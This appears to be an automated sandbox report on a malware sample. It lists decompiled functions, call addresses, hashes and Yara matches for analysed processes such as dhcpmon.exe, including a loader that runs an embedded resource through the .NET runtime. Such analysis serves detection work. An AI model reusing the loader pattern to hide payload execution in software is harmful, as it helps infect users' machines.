			}













                0x6ff8101f
                0x6ff81025
                0x6ff81035
                0x6ff81035
                0x6ff81040
                0x6ff81046
                0x6ff81089
                0x6ff810c4
                0x6ff810c6
                0x00000000
                0x6ff810c6
                0x6ff8108b
                0x6ff81092
                0x00000000
                0x00000000
                0x6ff81094
                0x6ff8109b
                0x6ff8109b
                0x6ff8109e
                0x6ff810a2
                0x6ff810a6
                0x6ff810a8
                0x6ff810aa
                0x6ff810aa
                0x6ff810af
                0x6ff810af
                0x6ff810b5
                0x6ff810bb
                0x00000000
                0x6ff810c3
                0x6ff8104d
                0x6ff81056
                0x6ff8105b
                0x6ff81061
                0x6ff81064
                0x6ff81069
                0x6ff8106e
                0x6ff81073
                0x6ff81078
                0x6ff8107d
                0x00000000
                0x6ff81084
                0x6ff8105d
                0x00000000
                0x6ff8105d
                0x6ff81027
                0x6ff8102d
                0x00000000
                0x00000000
                0x6ff8102f
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _inittermfreemalloc
                • String ID: kuP~u
                • API String ID: 1678931842-1219983255
                • Opcode ID: df36e0d104707d1ecfc1641f70e80e3cc07d5b22b2c4cc647e47770bba26362d
                • Instruction ID: c7bc85f0e9cc7fd678dcb6b5a636cc773bb653ac8a1cffe10946ec9d67a1aaae
                • Opcode Fuzzy Hash: df36e0d104707d1ecfc1641f70e80e3cc07d5b22b2c4cc647e47770bba26362d
                • Instruction Fuzzy Hash: E411E832636A81CFEB14CF74D954B6537B5BF077A5B10461AE531CB3E0EB22A850CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82090, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                Download Yara Rule
                C-Code - Quality: 41%
                			E6FF82090(intOrPtr* _a4, char* _a8, int* _a12, intOrPtr _a16) {
				short* _v8;
				short* _v12;
				signed int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				short* _t83;
				intOrPtr _t95;
				intOrPtr _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t135;
				void* _t136;

				_v8 = 0xc0000bbb;
				0x6ff80000("%p %p %p 0x%08x\n", _a4, _a8, _a12, _a16);
				_t136 = _t135 + 0x14;
				if(_a4 == 0 || _a12 == 0) {
					return 0xc0000bbd;
				}
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				if( *_a4 == 0) {
					L6:
					if( *((intOrPtr*)(_a4 + 4)) == 0) {
						L9:
						if( *((intOrPtr*)(_a4 + 8)) == 0) {
							L12:
							if( *((intOrPtr*)(_a4 + 0xc)) == 0) {
								L15:
								if( *((intOrPtr*)(_a4 + 0x14)) == 0) {
									L18:
									_v28 =  *((intOrPtr*)(_a4 + 0x10));
									_v16 = 0;
									_t83 = E6FF81EA0( &_v44, 0,  &_v16, _a16);
									_v8 = _t83;
									if(_v8 == 0x800007d2) {
										0x6ff80000(_v16 << 1);
										_t136 = _t136 + 4;
										_v12 = _t83;
										if(_v12 == 0) {
											_v8 = 0xc0000bbb;
										} else {
											_v8 = E6FF81EA0( &_v44, _v12,  &_v16, _a16);
											if(_v8 == 0) {
												_v20 = WideCharToMultiByte(0, 0, _v12, 0xffffffff, 0, 0, 0, 0);
												if( *_a12 < _v20) {
													_v8 = 0x800007d2;
												} else {
													WideCharToMultiByte(0, 0, _v12, 0xffffffff, _a8,  *_a12, 0, 0);
												}
												 *_a12 = _v20;
											}
											0x6ff80000(_v12);
											_t136 = _t136 + 4;
										}
									}
									L27:
									0x6ff80000(_v44);
									0x6ff80000(_v40);
									0x6ff80000(_v36);
									0x6ff80000(_v32);
									0x6ff80000(_v24);
									return _v8;
								}
								_t95 = E6FF82B80( *((intOrPtr*)(_a4 + 0x14)));
								_t136 = _t136 + 4;
								_v24 = _t95;
								if(_v24 != 0) {
									goto L18;
								}
								goto L27;
							}
							_t97 = E6FF82B80( *((intOrPtr*)(_a4 + 0xc)));
							_t136 = _t136 + 4;
							_v32 = _t97;
							if(_v32 != 0) {
								goto L15;
							}
							goto L27;
						}
						_t99 = E6FF82B80( *((intOrPtr*)(_a4 + 8)));
						_t136 = _t136 + 4;
						_v36 = _t99;
						if(_v36 != 0) {
							goto L12;
						}
						goto L27;
					}
					_t101 = E6FF82B80( *((intOrPtr*)(_a4 + 4)));
					_t136 = _t136 + 4;
					_v40 = _t101;
					if(_v40 != 0) {
						goto L9;
					}
					goto L27;
				}
				_t103 = E6FF82B80( *_a4);
				_t136 = _t136 + 4;
				_v44 = _t103;
				if(_v44 != 0) {
					goto L6;
				}
				goto L27;
			}





















                0x6ff82096
                0x6ff820b2
                0x6ff820b7
                0x6ff820be
                0x00000000
                0x6ff820c6
                0x6ff820d2
                0x6ff820d5
                0x6ff820d8
                0x6ff820db
                0x6ff820de
                0x6ff820e1
                0x6ff820ea
                0x6ff82108
                0x6ff8210f
                0x6ff8212e
                0x6ff82135
                0x6ff82154
                0x6ff8215b
                0x6ff8217a
                0x6ff82181
                0x6ff821a0
                0x6ff821a6
                0x6ff821a9
                0x6ff821be
                0x6ff821c3
                0x6ff821cd
                0x6ff821d9
                0x6ff821de
                0x6ff821e1
                0x6ff821e8
                0x6ff8226e
                0x6ff821ee
                0x6ff82203
                0x6ff8220a
                0x6ff82224
                0x6ff8222f
                0x6ff82251
                0x6ff82231
                0x6ff82249
                0x6ff82249
                0x6ff8225e
                0x6ff8225e
                0x6ff82264
                0x6ff82269
                0x6ff82269
                0x6ff821e8
                0x6ff82275
                0x6ff82279
                0x6ff82285
                0x6ff82291
                0x6ff8229d
                0x6ff822a9
                0x00000000
                0x6ff822b1
                0x6ff8218a
                0x6ff8218f
                0x6ff82192
                0x6ff82199
                0x00000000
                0x00000000
                0x00000000
                0x6ff8219b
                0x6ff82164
                0x6ff82169
                0x6ff8216c
                0x6ff82173
                0x00000000
                0x00000000
                0x00000000
                0x6ff82175
                0x6ff8213e
                0x6ff82143
                0x6ff82146
                0x6ff8214d
                0x00000000
                0x00000000
                0x00000000
                0x6ff8214f
                0x6ff82118
                0x6ff8211d
                0x6ff82120
                0x6ff82127
                0x00000000
                0x00000000
                0x00000000
                0x6ff82129
                0x6ff820f2
                0x6ff820f7
                0x6ff820fa
                0x6ff82101
                0x00000000
                0x00000000
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID: %p %p %p 0x%08x
                • API String ID: 0-2106592379
                • Opcode ID: 985701ae172881eaf6ffebc42810567474cb25d399680f3651fe86e1283d20a3
                • Instruction ID: 9ff21b7f37d80de3f6f4944a60e43cc42327b114859789f042502f158bb5db72
                • Opcode Fuzzy Hash: 985701ae172881eaf6ffebc42810567474cb25d399680f3651fe86e1283d20a3
                • Instruction Fuzzy Hash: E4710AB5904208EFDF04CF94D980BDEB7B5BF48314F208659E925AB384D775BA80CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82560, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E6FF82560(intOrPtr _a4, intOrPtr _a8, char* _a12, int* _a16) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				char _v20;
				short _v2068;
				short* _t32;
				intOrPtr _t33;
				int _t44;
				void* _t58;
				void* _t61;

				_v8 = 0;
				_t32 =  &_v2068;
				0x6ff80000(_t32);
				_v20 = _t32;
				_t33 = _a8;
				0x6ff80000(_a4, _t33, _a12, _a16);
				0x6ff80000("%s %d %p %p\n", _t33);
				_t61 = _t58 + 0x1c;
				if(_a12 == 0 || _a16 == 0) {
					return 0xc0000bbd;
				} else {
					if(_a4 == 0) {
						L6:
						_v16 = E6FF82440(_v8, _a8,  &_v2068,  &_v20);
						if(_v16 == 0) {
							_v12 = WideCharToMultiByte(0, 0,  &_v2068, 0xffffffff, 0, 0, 0, 0);
							if( *_a16 >= _v12) {
								WideCharToMultiByte(0, 0,  &_v2068, 0xffffffff, _a12, _v12, 0, 0);
							} else {
								_v16 = 0x800007d2;
							}
							 *_a16 = _v12;
						}
						0x6ff80000(_v8);
						return _v16;
					}
					_t44 = E6FF82B80(_a4);
					_t61 = _t61 + 4;
					_v8 = _t44;
					if(_v8 != 0) {
						goto L6;
					}
					return 0xc0000bbb;
				}
			}













                0x6ff82569
                0x6ff82570
                0x6ff82577
                0x6ff8257f
                0x6ff8258a
                0x6ff82592
                0x6ff825a0
                0x6ff825a5
                0x6ff825ac
                0x00000000
                0x6ff825be
                0x6ff825c2
                0x6ff825e3
                0x6ff825fb
                0x6ff82602
                0x6ff8261f
                0x6ff8262a
                0x6ff8264e
                0x6ff8262c
                0x6ff8262c
                0x6ff8262c
                0x6ff8265a
                0x6ff8265a
                0x6ff82660
                0x00000000
                0x6ff82668
                0x6ff825c8
                0x6ff825cd
                0x6ff825d0
                0x6ff825d7
                0x00000000
                0x00000000
                0x00000000
                0x6ff825d9

                APIs
                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FF82619
                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FF8264E
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ByteCharMultiWide
                • String ID: %s %d %p %p
                • API String ID: 626452242-2135802371
                • Opcode ID: 6e9ce29c9425910820c4e229cbb414f0b48d590d38c59ede3c92a0b9dbae5527
                • Instruction ID: 933faf7f063966fcdbdc59592c8d1b00372ffe5c736e11dc471f9cf96b6655b6
                • Opcode Fuzzy Hash: 6e9ce29c9425910820c4e229cbb414f0b48d590d38c59ede3c92a0b9dbae5527
                • Instruction Fuzzy Hash: B0313AB5904208ABDF10DF94CD40FAE77B8BF08714F108559B924AB2C4D7B5AA51CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82CE0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                Download Yara Rule
                C-Code - Quality: 16%
                			E6FF82CE0(intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				intOrPtr _v12;
				short _v44;
				long _t13;
				intOrPtr _t17;

				_t13 =  &_v44;
				0x6ff80000(_t13);
				_v8 = _t13;
				if(GetComputerNameW( &_v44,  &_v8) != 0) {
					if(_a8 != _v8) {
						L5:
						_v12 = 0;
						L6:
						return _v12;
					}
					_t17 = _a4;
					__imp___wcsnicmp(_t17,  &_v44, _v8);
					if(_t17 != 0) {
						goto L5;
					}
					_v12 = 1;
					goto L6;
				}
				return 0;
			}








                0x6ff82ce6
                0x6ff82cea
                0x6ff82cf2
                0x6ff82d05
                0x6ff82d11
                0x6ff82d35
                0x6ff82d35
                0x6ff82d3c
                0x00000000
                0x6ff82d3c
                0x6ff82d1b
                0x6ff82d1f
                0x6ff82d2a
                0x00000000
                0x00000000
                0x6ff82d2c
                0x00000000
                0x6ff82d2c
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ComputerName_wcsnicmp
                • String ID: P~u
                • API String ID: 657830731-3400813311
                • Opcode ID: 464b5313d9c2caf99660f91777d5271ca2e87ac49fb3cc1bc335c63ededf5179
                • Instruction ID: 4bbd63994f885e24792fda9b50c5bdf1e5b715894faeef8b914172634ccad60d
                • Opcode Fuzzy Hash: 464b5313d9c2caf99660f91777d5271ca2e87ac49fb3cc1bc335c63ededf5179
                • Instruction Fuzzy Hash: B8F03CB2904208EBCB00DFA4C988ACEBBB8AF08314F504954E916AB204F731F6958B71
                Uniqueness

                Uniqueness Score: -1.00%

                Analysis Process: dhcpmon.exe PID: 6812 Parent PID: 6692 dhcpmon.exeCOMMON

                Executed Functions

                Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




                0x00401e22
                0x00401e28

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                Memory Dump Source
                • Source File: 00000017.00000001.311259077.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E3850, Relevance: .8, Instructions: 766COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d80072f7b6f4623a433c62ba0f284a9428f651ea4c0987250f048edc3f7964ed
                • Instruction ID: 3e97e91d749bd3aa49fe8cc235031dac8e679a91a2461ef147c1e82cc63a1cea
                • Opcode Fuzzy Hash: d80072f7b6f4623a433c62ba0f284a9428f651ea4c0987250f048edc3f7964ed
                • Instruction Fuzzy Hash: EF52E471A04206DFCB26CF69C4849B9BBB6FF85300B19C9A6D9199F256D731FC42CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E23A0, Relevance: .5, Instructions: 505COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 28be4028890d767d6303bc1760418e224574b90b13f89aefcee74e8f546051d5
                • Instruction ID: b0f992b489f2b16cebaa409532d8648a8269c45ab5d89216ba4ee9570608baba
                • Opcode Fuzzy Hash: 28be4028890d767d6303bc1760418e224574b90b13f89aefcee74e8f546051d5
                • Instruction Fuzzy Hash: 1812AE30E00215CFC725DFB6D5886BDBBFABB84304F2489B9D4169B295EB74A885DF40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E2FA8, Relevance: .2, Instructions: 239COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2e86ab1947b569dbe6c54c53334a928357e02062db40a766206c4fef4ac9449b
                • Instruction ID: 8830f866ee8865bd624feaf7adc56397e772c42c076757f5c49c3920a7ff49e0
                • Opcode Fuzzy Hash: 2e86ab1947b569dbe6c54c53334a928357e02062db40a766206c4fef4ac9449b
                • Instruction Fuzzy Hash: 4E81A231F011169BD724DB69D944A6EB7F7AFC8310F2A8475E805DB36ADE31EC018B90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








                0x0040149f
                0x004014a5
                0x004014a9
                0x004014ec
                0x004014ee
                0x004014ee
                0x004014b7
                0x004014bb
                0x004014c7
                0x004014cd
                0x004014d3
                0x004014d8
                0x004014e0
                0x004014e0
                0x004014d8
                0x004014e6
                0x00000000

                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                  • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                • ExitProcess.KERNEL32 ref: 004014EE
                Strings
                Memory Dump Source
                • Source File: 00000017.00000001.311259077.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                • String ID: v2.0.50727
                • API String ID: 2372384083-2350909873
                • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







                0x004055c5
                0x004055cf
                0x004055d3
                0x004055e4
                0x004055e8
                0x004055ed
                0x004055f3
                0x004055f8
                0x004055fd
                0x00405602
                0x00405609
                0x004055d5
                0x004055d5
                0x004055d5
                0x00405614

                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                Memory Dump Source
                • Source File: 00000017.00000001.311259077.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: EnvironmentStrings$Free
                • String ID:
                • API String ID: 3328510275-0
                • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0223B080, Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • SetConsoleCtrlHandler.KERNELBASE(?,00000E80,?,?), ref: 0223B115
                Memory Dump Source
                • Source File: 00000017.00000002.327371634.000000000223A000.00000040.00000001.sdmp, Offset: 0223A000, based on PE: false
                Similarity
                • API ID: ConsoleCtrlHandler
                • String ID:
                • API String ID: 1513847179-0
                • Opcode ID: e3083357fcac0418654120e1fb84825aa228f936bd9730ac219f3d6e83f05744
                • Instruction ID: 453c6b09797e9d020b7cb371c1053e84de5ff23a73828b35e1062d46bbcf5f14
                • Opcode Fuzzy Hash: e3083357fcac0418654120e1fb84825aa228f936bd9730ac219f3d6e83f05744
                • Instruction Fuzzy Hash: A841D5755093809FD7128F25DC45B62BFB4EF43624F0980DBEC84CB693D224A919CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0223AA7E, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 0223AB2D
                Memory Dump Source
                • Source File: 00000017.00000002.327371634.000000000223A000.00000040.00000001.sdmp, Offset: 0223A000, based on PE: false
                Similarity
                • API ID: Open
                • String ID:
                • API String ID: 71445658-0
                • Opcode ID: f1c613b3e63f130aa1361af0a29c251fff008e72758b5286f29ed2d9e68046d0
                • Instruction ID: 0d4a59a7e76d840fe8f326c853d7fb8a7778f109fa13be505d839a49f7ff3012
                • Opcode Fuzzy Hash: f1c613b3e63f130aa1361af0a29c251fff008e72758b5286f29ed2d9e68046d0
                • Instruction Fuzzy Hash: D731C2B25443846FE7228F25CC45FA7BFA8EF06710F0884AAE9858B152D224A509C771
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0223AB75, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                Download Yara Rule
                APIs
                • RegQueryValueExW.KERNELBASE(?,00000E80,8D4530D7,00000000,00000000,00000000,00000000), ref: 0223AC30
                Memory Dump Source
                • Source File: 00000017.00000002.327371634.000000000223A000.00000040.00000001.sdmp, Offset: 0223A000, based on PE: false
                Similarity
                • API ID: QueryValue
                • String ID:
                • API String ID: 3660427363-0
                • Opcode ID: 5d1b983ce23718b86769df617d9944f1a6297c6632e29b4925147390ca2ae358
                • Instruction ID: b902f8bb57e2028e81149cf8ceab903f6ec900bb7202478db35d4adab766a506
                • Opcode Fuzzy Hash: 5d1b983ce23718b86769df617d9944f1a6297c6632e29b4925147390ca2ae358
                • Instruction Fuzzy Hash: 7731B3B15083806FE722CF65CC44FA2BFE8EF06710F0888AAE984CB153D364E549CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0223B51B, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000017.00000002.327371634.000000000223A000.00000040.00000001.sdmp, Offset: 0223A000, based on PE: false
                Similarity
                • API ID: ClassInfo
                • String ID:
                • API String ID: 3534257612-0
                • Opcode ID: 2f25a76005611988595c07a4d5037757b4b84f74c4aaa056731063e3d7627feb
                • Instruction ID: ea7505679435a39313ec944e3f6da3f5efdd571b9c70edf18fe3eadf1189df47
                • Opcode Fuzzy Hash: 2f25a76005611988595c07a4d5037757b4b84f74c4aaa056731063e3d7627feb
                • Instruction Fuzzy Hash: 57314AB650E3C05FE7138B259C50A92BFB4AF07614F0E80DBD984CF1A3D2259918C762
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04C70416, Relevance: 1.6, APIs: 1, Instructions: 84synchronizationCOMMON
                Download Yara Rule
                APIs
                • CreateMutexW.KERNELBASE(?,?), ref: 04C704B1
                Memory Dump Source
                • Source File: 00000017.00000002.328008515.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                Similarity
                • API ID: CreateMutex
                • String ID:
                • API String ID: 1964310414-0
                • Opcode ID: 2c3b84f2b129a97b7e41a989171efafd090e2594cc85b80dc240de524af23431
                • Instruction ID: 40850a2c72bc94f8c15a3085f73dffa15e9a4804089b81c65564c0d1bee0de71
                • Opcode Fuzzy Hash: 2c3b84f2b129a97b7e41a989171efafd090e2594cc85b80dc240de524af23431
                • Instruction Fuzzy Hash: 68318071509380AFE721CF25CC85B66FFE8EF05210F0884AEE984CB292D365E908CB65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0223AAAE, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 0223AB2D
                Memory Dump Source
                • Source File: 00000017.00000002.327371634.000000000223A000.00000040.00000001.sdmp, Offset: 0223A000, based on PE: false
                Similarity
                • API ID: Open
                • String ID:
                • API String ID: 71445658-0
                • Opcode ID: 01be0d49ee26f04ff58f091d23ad2016e3d22b8dbce39c0797ec32c7edcf13d5
                • Instruction ID: 8ddc45f57fe39d172d75993edb84594d41bd26a9e10875a60894d3d0b222c541
                • Opcode Fuzzy Hash: 01be0d49ee26f04ff58f091d23ad2016e3d22b8dbce39c0797ec32c7edcf13d5
                • Instruction Fuzzy Hash: B721CFB2500304AFEB218F59DC44FAAFBEDEF08710F04842AE9859A245D360E508CA71
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04C7043E, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                Download Yara Rule
                APIs
                • CreateMutexW.KERNELBASE(?,?), ref: 04C704B1
                Memory Dump Source
                • Source File: 00000017.00000002.328008515.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                Similarity
                • API ID: CreateMutex
                • String ID:
                • API String ID: 1964310414-0
                • Opcode ID: d2a19d5f170f977fc120d32754ef1d69ebc29ba102d2e0f767ec6b48c2c3dd3a
                • Instruction ID: 82e326340378ee706875ce5a9440a117daf94b98861b3db24eceeef7ddbe2c3a
                • Opcode Fuzzy Hash: d2a19d5f170f977fc120d32754ef1d69ebc29ba102d2e0f767ec6b48c2c3dd3a
                • Instruction Fuzzy Hash: 5E218E71640240AFE720DF2ADD85B66FBE8EF04720F18846AED89DB242E275F504CB75
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0223ABB6, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                Download Yara Rule
                APIs
                • RegQueryValueExW.KERNELBASE(?,00000E80,8D4530D7,00000000,00000000,00000000,00000000), ref: 0223AC30
                Memory Dump Source
                • Source File: 00000017.00000002.327371634.000000000223A000.00000040.00000001.sdmp, Offset: 0223A000, based on PE: false
                Similarity
                • API ID: QueryValue
                • String ID:
                • API String ID: 3660427363-0
                • Opcode ID: 000b1974b7c3126445832668605bdb61813d0de183e3c5dda0333f93873491c3
                • Instruction ID: 6bc2f97821a0577ffe43ac658855743a9b734035da6448d9d0f8dac573be7a4c
                • Opcode Fuzzy Hash: 000b1974b7c3126445832668605bdb61813d0de183e3c5dda0333f93873491c3
                • Instruction Fuzzy Hash: 9D218EB1600704AFEB21CF56DC84FA6BBE8EF04710F08896AE989CB255D764E448CA71
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0223BB8A, Relevance: 1.6, APIs: 1, Instructions: 61windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,?,?,?), ref: 0223BC01
                Memory Dump Source
                • Source File: 00000017.00000002.327371634.000000000223A000.00000040.00000001.sdmp, Offset: 0223A000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 01740de6d8edd8301bc6f942384b191ed0af1a6cee85e3f2e8054fb0fbf0def4
                • Instruction ID: eef9bc4a96779f155801e87d919ad00a11d215619148fbb93438f7824406dfb4
                • Opcode Fuzzy Hash: 01740de6d8edd8301bc6f942384b191ed0af1a6cee85e3f2e8054fb0fbf0def4
                • Instruction Fuzzy Hash: DC218E714097C09FDB238B61DC54AA2BFB0AF17214F0D84DAE9C44F163D265A958D762
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0223A59B, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                Download Yara Rule
                APIs
